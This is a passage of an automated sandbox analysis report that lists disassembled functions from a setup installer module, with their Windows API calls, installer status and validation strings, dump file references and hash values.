                                                              • Opcode Fuzzy Hash: 93d4a4252b620e5171147be8cd95cbb3be53704c4253e22a8646d16679a8241b
                                                              • Instruction Fuzzy Hash: A0E15C721083849FD310CF68C840B8EBBE4BFA5358F148A59F594D7B91DB70E949CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C93CC30 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C93CC37
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C93B9EE: __EH_prolog3.LIBCMT ref: 6C93B9F5
                                                              • GetTickCount.KERNEL32 ref: 6C93CE49
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              Strings
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d) Negative progress ignored!!, xrefs: 6C93CD48
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d), xrefs: 6C93CD3B
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Master Reset: tickCount=%d range=%d), xrefs: 6C93CE56
                                                              • INSTALLMESSAGE_PROGRESS - Action Data message received, but step size is zero, xrefs: 6C93CCF0
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Action Info), xrefs: 6C93CD96
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Progress Addition), xrefs: 6C93CCB2
                                                              • INSTALLMESSAGE_PROGRESS [%s] (Action Data: iProgress=%d iStep=%d), xrefs: 6C93CD0E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CountTick
                                                              • String ID: INSTALLMESSAGE_PROGRESS - Action Data message received, but step size is zero$INSTALLMESSAGE_PROGRESS [%s] (Action Data: iProgress=%d iStep=%d)$INSTALLMESSAGE_PROGRESS [%s] (Action Info)$INSTALLMESSAGE_PROGRESS [%s] (Master Reset: tickCount=%d range=%d)$INSTALLMESSAGE_PROGRESS [%s] (Progress Addition)$INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d)$INSTALLMESSAGE_PROGRESS [%s] (Progress Report: iProgress=%d) Negative progress ignored!!
                                                              • API String ID: 194692712-1811215275
                                                              • Opcode ID: fac569d3d931ad3a2bc1544afb2d1c57489a142bc8fcbbe1c63ef2a42f827066
                                                              • Instruction ID: 17ddb53baebd0114dd06de16b61149e057b8d59ec4235f3743925ce5f2da0d55
                                                              • Opcode Fuzzy Hash: fac569d3d931ad3a2bc1544afb2d1c57489a142bc8fcbbe1c63ef2a42f827066
                                                              • Instruction Fuzzy Hash: 4E71C271600A79BFE711AB68C842BA9BB78FF15318F105615F628DBE90D730E865CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C964D3F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143commemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C964D46
                                                                • Part of subcall function 6C968859: SysStringByteLen.OLEAUT32(00000000), ref: 6C968860
                                                                • Part of subcall function 6C968859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6C968869
                                                              • CoInitialize.OLE32(00000000), ref: 6C964D5F
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,00000000), ref: 6C964D7D
                                                              • SysAllocString.OLEAUT32(.//MsiXmlBlob), ref: 6C964DE2
                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C964E1A
                                                              • SysFreeString.OLEAUT32(?), ref: 6C964E7E
                                                                • Part of subcall function 6C968E8C: __CxxThrowException@8.LIBCMT ref: 6C968EA0
                                                              • CoUninitialize.OLE32(?,?,00000000), ref: 6C964ECA
                                                              • SysFreeString.OLEAUT32(6C90970C), ref: 6C964ED3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: String$Free$AllocByte$CreateException@8H_prolog3InitializeInstanceThrowUninitialize
                                                              • String ID: .//MsiXmlBlob
                                                              • API String ID: 4093593479-2641887801
                                                              • Opcode ID: 9fa645851fa79315da17b4b505bd84aee2aa070beeb6810970192bff513fd5c5
                                                              • Instruction ID: 95d4db5e455d6ad0dd96aa9326dca329c63519975631544a83dc2a1b9973bba4
                                                              • Opcode Fuzzy Hash: 9fa645851fa79315da17b4b505bd84aee2aa070beeb6810970192bff513fd5c5
                                                              • Instruction Fuzzy Hash: 72519070A01259DFDF01CBE4C998AEEBBB9BF59708F248458E011FB681C775DA45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95CEC8 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 111libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(msi.dll,MsiSetExternalUIRecord,512AC3CC,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95CF07
                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C95CF0E
                                                              Strings
                                                              • msi.dll, xrefs: 6C95CF02
                                                              • MsiSetExternalUIRecord, xrefs: 6C95CEFD
                                                              • IUiFactory::CreateMsi31RequiredDialog() failed with error hr = %d, xrefs: 6C95CF73
                                                              • MSI31, xrefs: 6C95CF9E
                                                              • CreateMsi31RequiredDialog, xrefs: 6C95CF59
                                                              • Windows Installer version is less than 3.1, xrefs: 6C95CF28
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: CreateMsi31RequiredDialog$IUiFactory::CreateMsi31RequiredDialog() failed with error hr = %d$MSI31$MsiSetExternalUIRecord$Windows Installer version is less than 3.1$msi.dll
                                                              • API String ID: 1646373207-1012198820
                                                              • Opcode ID: 05fc729852a04d19974ed0b1629aae78924e1e5a625c83d336660fc2805fbb8a
                                                              • Instruction ID: 0575e1cee65dc20781981750fb9c735a31a5f94dde37647529a71a6a244a87b4
                                                              • Opcode Fuzzy Hash: 05fc729852a04d19974ed0b1629aae78924e1e5a625c83d336660fc2805fbb8a
                                                              • Instruction Fuzzy Hash: 52415CB5608341EFC710DF64D888E5ABBE8FB99264F004A2DF955C3B51DB35D908CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C927C1F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C927C26
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C927DCC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Cartman$ExeType$HotIron$IronMan$LocalExe$MsuPackage
                                                              • API String ID: 2489616738-3730881327
                                                              • Opcode ID: 74323c674a0b8e524e4f29186dbc00093648e7f9289b59c6fe60b20b52f31ab5
                                                              • Instruction ID: 51af0224593eed145052f5ab7f7bb0fea5ebd765dc8d75c87921e2306f13695c
                                                              • Opcode Fuzzy Hash: 74323c674a0b8e524e4f29186dbc00093648e7f9289b59c6fe60b20b52f31ab5
                                                              • Instruction Fuzzy Hash: 2D51D6306192458FCB08CFE9C8816AD7BF8BF16368B244229E465E7BD0D734C945CBA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C931EBF Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C931EC6
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C93202D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Continue$OnSubFailureAction$ParameterInfo.xml$Rollback$Stop$schema validation failure: invalid attribute value for - OnSubFailureAction
                                                              • API String ID: 2489616738-3344869707
                                                              • Opcode ID: dacb51695d79899c8a157bd57cdd9b3ecf6ce733f21238648b88c9df58db266b
                                                              • Instruction ID: 99e07ad74ada2c6734072cef4b97c94086124ccf38faca5b94f270bcf94b55b4
                                                              • Opcode Fuzzy Hash: dacb51695d79899c8a157bd57cdd9b3ecf6ce733f21238648b88c9df58db266b
                                                              • Instruction Fuzzy Hash: 8741B3319001099BDB04DBE8CD41BEE77BDAF36318F144559E024E7F80DB30DA098BA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C926F73 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C926F7A
                                                                • Part of subcall function 6C948608: __wcsicoll.LIBCMT ref: 6C948626
                                                              • __CxxThrowException@8.LIBCMT ref: 6C927087
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw__wcsicoll
                                                              • String ID: False$ParameterInfo.xml$True$false$schema validation failure: invalid IgnoreDownloadFailure attribute value$true
                                                              • API String ID: 1238845444-4159781073
                                                              • Opcode ID: 8143eb1980b0262e7d2ef4aedc18070349fb61c0cafc16537d68e550bc39a574
                                                              • Instruction ID: 6de4a0f6689a801c0a27cf78c68f95490aca254a5de03b6f7a0d4a71a240489c
                                                              • Opcode Fuzzy Hash: 8143eb1980b0262e7d2ef4aedc18070349fb61c0cafc16537d68e550bc39a574
                                                              • Instruction Fuzzy Hash: E631AF32914208AFDB14DFA8C901BDE77B86F35358F148659E024EBF80DB34DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C956E8C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 495COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0x%x$Crash$HKLM\Software\Microsoft\Internet Explorer\Registration\DigitalProductID$VSSetup
                                                              • API String ID: 0-732999933
                                                              • Opcode ID: de96577ba69704f0e11b21332087ed12e143f971e0a88532db7eafd88ed01dd3
                                                              • Instruction ID: f9c4363d769d94dd6daa34808d3ca660d4c1b800dd1b4773969114289e6f2633
                                                              • Opcode Fuzzy Hash: de96577ba69704f0e11b21332087ed12e143f971e0a88532db7eafd88ed01dd3
                                                              • Instruction Fuzzy Hash: E222A3712083818FD724CF68C840B9EB7E5BFA5318F144A1EF59897B91CB70D958CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C958C5B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 128memorystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C958C62
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • lstrlenW.KERNEL32(</MsiXmlBlob>,</MsiXmlBlob>,512AC3CC,<MsiXmlBlob,?,?,00000008,6C9580B1,?,?,00000000,6C9552B8,00000002,-000000F4,?,00000002), ref: 6C958CCC
                                                              • SysAllocString.OLEAUT32(?), ref: 6C958D1D
                                                              • __EH_prolog3.LIBCMT ref: 6C958D43
                                                              • #270.MSI(?,00000000,00000007,00000007,00000000,00000010,00000000,00000000,00000000,00000000), ref: 6C958D91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$#270AllocStringlstrlen
                                                              • String ID: </MsiXmlBlob>$<MsiXmlBlob
                                                              • API String ID: 2868861991-3177253548
                                                              • Opcode ID: db5167eb7bb92c295acd7769d114e8c706671580a5ba5427f6eb3790388a183a
                                                              • Instruction ID: f06049f4574eeb23ce8671466ed8c4fd1f7d2961e7c279ca7fb5478c022e1bf1
                                                              • Opcode Fuzzy Hash: db5167eb7bb92c295acd7769d114e8c706671580a5ba5427f6eb3790388a183a
                                                              • Instruction Fuzzy Hash: 67418F71601109EFDB18DF64C8809ED77B9BF61328F14861AE825DBB80D730DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C926E28 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C926E2F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948608: __wcsicoll.LIBCMT ref: 6C948626
                                                              • __CxxThrowException@8.LIBCMT ref: 6C926F68
                                                              Strings
                                                              • schema validation failure: invalid IgnoreDownloadFailure attribute value, xrefs: 6C926EDB
                                                              • true, xrefs: 6C926E83
                                                              • ParameterInfo.xml, xrefs: 6C926EE9
                                                              • false, xrefs: 6C926E95
                                                              • IgnoreDownloadFailure, xrefs: 6C926E38
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw__wcsicoll
                                                              • String ID: IgnoreDownloadFailure$ParameterInfo.xml$false$schema validation failure: invalid IgnoreDownloadFailure attribute value$true
                                                              • API String ID: 3031948457-1650268905
                                                              • Opcode ID: dfb322b197c3e3d5cb4da59ef63f9629c12b9e457d7b2f9e92f98498b94c9c8d
                                                              • Instruction ID: 9918958a109525bb9672669183d6c46dd91d245a57621f550c82b31b33f71ec4
                                                              • Opcode Fuzzy Hash: dfb322b197c3e3d5cb4da59ef63f9629c12b9e457d7b2f9e92f98498b94c9c8d
                                                              • Instruction Fuzzy Hash: 1441A371900109EFDB14DBB8C945BEE77B86F25318F148659E025EBF80DB34DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C933C17 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: Bad product drive hint type!$ComponentHint$No product drive hints found!$ParameterInfo.xml$RegKeyHint
                                                              • API String ID: 3670251406-217397854
                                                              • Opcode ID: ec96f7a5638cc191de77927f7619e3b64d4b237a0aa159e1ccbae0addf3235eb
                                                              • Instruction ID: 94862e584d750abb9017cc3dca27a18ab6799090e1289e63c2ba569643df6310
                                                              • Opcode Fuzzy Hash: ec96f7a5638cc191de77927f7619e3b64d4b237a0aa159e1ccbae0addf3235eb
                                                              • Instruction Fuzzy Hash: 42319371905249EFCB00CFE8C980ADDBBB9BF25318F248559E025E7B40D730DA09CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C965F0D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C965F14
                                                              • GetProcAddress.KERNEL32(00000006,GetProcessImageFileNameW), ref: 6C965F24
                                                              • GetLastError.KERNEL32 ref: 6C965F32
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C948C24: __EH_prolog3.LIBCMT ref: 6C948C2B
                                                                • Part of subcall function 6C94FF21: _wcsnlen.LIBCMT ref: 6C94FF54
                                                                • Part of subcall function 6C94FF21: _memcpy_s.LIBCMT ref: 6C94FF8A
                                                                • Part of subcall function 6C9187EC: __EH_prolog3.LIBCMT ref: 6C9187F3
                                                              • __CxxThrowException@8.LIBCMT ref: 6C965FE9
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$AddressDispatcherErrorExceptionException@8LastProcThrowUser_memcpy_s_wcsnlen
                                                              • String ID: in $GetProcAddress looking for $GetProcessImageFileNameW
                                                              • API String ID: 3164256213-2471920563
                                                              • Opcode ID: 8fe9068cd9f45bb70eb51ca63670071639bad0d0799cf006d44fb4afe4700a2b
                                                              • Instruction ID: b22a7ccce4bdba1dd0a3826ab07c676515b226a0f4edb5358891d08dcde7ca7b
                                                              • Opcode Fuzzy Hash: 8fe9068cd9f45bb70eb51ca63670071639bad0d0799cf006d44fb4afe4700a2b
                                                              • Instruction Fuzzy Hash: 40216672901149ABDF14DBE8DD44BEEB7B8AF29318F144259E110E7A80D734DA18C7B9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C914CB2 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C914CB9
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Creating Layout$Error$Installing$Repairing$Uninstalling$Uninstalling Patch
                                                              • API String ID: 431132790-1745000867
                                                              • Opcode ID: 19a7cfd0f67d154e2b69430231841caa2f342995dcfc80cc8ecb0eb88009a437
                                                              • Instruction ID: 79983d2572a08d65c6cdce938f6b286b33ed010c6fa9acab2fab80a6bbe2897f
                                                              • Opcode Fuzzy Hash: 19a7cfd0f67d154e2b69430231841caa2f342995dcfc80cc8ecb0eb88009a437
                                                              • Instruction Fuzzy Hash: 70F0C8356AD20EB6FF208A148E02FB86121E765B6EF204801E424ABFC1C7B4E505EA16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C965D8B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C965D92
                                                              • GetLastError.KERNEL32(?,Setup Installer,00000001,00000000,00000000,00000000,?,?,6C964247,00000000,?), ref: 6C965DD0
                                                              • GetLastError.KERNEL32(?,Setup Installer,00000001,00000000,00000000,00000000,?,?,6C964247,00000000,?), ref: 6C965E72
                                                              Strings
                                                              • Auto detecting proxy information, xrefs: 6C965D9C
                                                              • WinHttpDetectAutoProxyConfigUrl, xrefs: 6C965DD9
                                                              • WinHttpGetProxyForUrl, xrefs: 6C965E7B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3
                                                              • String ID: Auto detecting proxy information$WinHttpDetectAutoProxyConfigUrl$WinHttpGetProxyForUrl
                                                              • API String ID: 3502553090-3439616282
                                                              • Opcode ID: 74401bb3cc222331866baf5b7c9238539ae3b2ed33b42e576d12d648af5136f9
                                                              • Instruction ID: 8aa86a23fb8fb86cfea362706a560098b22125514ef7642c277d901e06113275
